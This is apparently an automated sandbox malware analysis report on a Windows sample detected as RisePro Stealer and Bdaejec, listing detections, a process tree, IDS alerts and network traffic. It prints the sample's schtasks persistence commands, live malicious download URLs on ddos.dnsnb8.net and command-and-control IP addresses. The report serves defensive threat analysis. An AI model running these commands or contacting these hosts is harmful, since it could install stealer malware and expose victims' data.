Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1A_89.exe

Overview

General Information

Sample name:	Lisect_AVT_24003_G1A_89.exe
Analysis ID:	1481168
MD5:	ee50f2db274c7abdbae3713a14020c24
SHA1:	312af659d98d04b23c6ab5f5324604fd04a96777
SHA256:	60285015f8b5e32f20411d30b7c64d8748827409275f5a42053b307bc2ff17de
Tags:	exe
Infos:

Detection

Bdaejec, RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Bdaejec

Yara detected RisePro Stealer

AI detected suspicious sample

Contains functionality to check for running processes (XOR)

Contains functionality to inject threads in other processes

Found stalling execution ending in API Sleep call

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

PE file has nameless sections

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

Lisect_AVT_24003_G1A_89.exe (PID: 4912 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe" MD5: EE50F2DB274C7ABDBAE3713A14020C24)

jHYZko.exe (PID: 6484 cmdline: C:\Users\user\AppData\Local\Temp\jHYZko.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 7104 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6540 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MPGPH131.exe (PID: 5272 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: EE50F2DB274C7ABDBAE3713A14020C24)

MPGPH131.exe (PID: 3692 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: EE50F2DB274C7ABDBAE3713A14020C24)

RageMP131.exe (PID: 1716 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: EE50F2DB274C7ABDBAE3713A14020C24)

jHYZko.exe (PID: 2516 cmdline: C:\Users\user\AppData\Local\Temp\jHYZko.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: jHYZko.exe PID: 6484	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: MPGPH131.exe PID: 5272	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MPGPH131.exe PID: 3692	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RageMP131.exe PID: 1716	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: jHYZko.exe PID: 2516	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe, ProcessId: 4912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:10:44.519984+0200
SID:	2807908
Source Port:	49732
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:09:55.531590+0200
SID:	2807908
Source Port:	49704
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.5 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T05:10:31.462461+0200
SID:	2049060
Source Port:	49728
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:10:02.223135+0200
SID:	2807908
Source Port:	49707
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.5 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T05:10:00.675949+0200
SID:	2046269
Source Port:	49705
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:10:30.346508+0200
SID:	2807908
Source Port:	49727
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T05:10:13.800528+0200
SID:	2022930
Source Port:	443
Destination Port:	49716
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:09:59.332194+0200
SID:	2807908
Source Port:	49706
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.5 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T05:10:06.727757+0200
SID:	2046269
Source Port:	49709
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T05:10:51.379391+0200
SID:	2022930
Source Port:	443
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.5 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T05:10:06.727684+0200
SID:	2046269
Source Port:	49708
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:10:38.238368+0200
SID:	2807908
Source Port:	49730
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.5 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T05:10:34.439275+0200
SID:	2046269
Source Port:	49728
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:10:32.891475+0200
SID:	2807908
Source Port:	49729
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.5 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T05:10:03.590242+0200
SID:	2049060
Source Port:	49709
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.5 - Destination IP: 52.182.143.212

Timestamp:	2024-07-25T05:10:23.933973+0200
SID:	2028371
Source Port:	49726
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.5 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T05:09:57.684082+0200
SID:	2049060
Source Port:	49705
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T05:09:54.991218+0200
SID:	2838522
Source Port:	50908
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T05:10:41.347942+0200
SID:	2807908
Source Port:	49731
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Lisect_AVT_24003_G1A_89.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k3.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarZ	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/=	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar=x	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar=x	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rar(y	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rarC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarL	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarO	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarR	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rartC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarsC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarExh	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarm	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rarHxg	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarpy_	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC:	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for domain / URL

Source: ddos.dnsnb8.net	Virustotal: Detection: 12%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarZ	Virustotal: Detection: 12%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rar=x	Virustotal: Detection: 11%	Perma Link
Source: http://ddos.dnsnb8.net/=	Virustotal: Detection: 14%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl	Virustotal: Detection: 10%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k4.rarC:	Virustotal: Detection: 12%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k5.rar	Virustotal: Detection: 12%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rarO	Virustotal: Detection: 15%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rarL	Virustotal: Detection: 8%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rarR	Virustotal: Detection: 16%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rartC:	Virustotal: Detection: 12%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k4.rar	Virustotal: Detection: 12%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k5.rarsC:	Virustotal: Detection: 15%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rarm	Virustotal: Detection: 15%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC:	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\MPGPH131\MPGPH131.exe	ReversingLabs: Detection: 94%
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Virustotal: Detection: 86%	Perma Link
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Virustotal: Detection: 86%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Virustotal: Detection: 90%	Perma Link

Multi AV Scanner detection for submitted file

Source: Lisect_AVT_24003_G1A_89.exe	ReversingLabs: Detection: 94%
Source: Lisect_AVT_24003_G1A_89.exe	Virustotal: Detection: 86%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Lisect_AVT_24003_G1A_89.exe

Joe Sandbox ML: detected

Source: Lisect_AVT_24003_G1A_89.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0108B3B5 recv,FindFirstFileExW,GetLastError,	0_2_0108B3B5
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01898D7B FindFirstFileA,	0_2_01898D7B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0108B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	0_2_0108B41B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Code function: 1_2_00E629E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00E629E2
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0064B3B5 recv,FindFirstFileExW,GetLastError,	7_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	7_2_0064B41B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0064B3B5 recv,FindFirstFileExW,GetLastError,	8_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	8_2_0064B41B

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Code function: 1_2_00E62B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00E62B8C

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 799

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 193.233.132.62:50500

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 193.233.132.62 193.233.132.62
Source: Joe Sandbox View	IP Address: 193.233.132.62 193.233.132.62

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Code function: 0_2_00FCDB60 recv,WSAStartup,getaddrinfo,closesocket,socket,connect,closesocket,FreeAddrInfoW,WSACleanup,FreeAddrInfoW,

0_2_00FCDB60

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
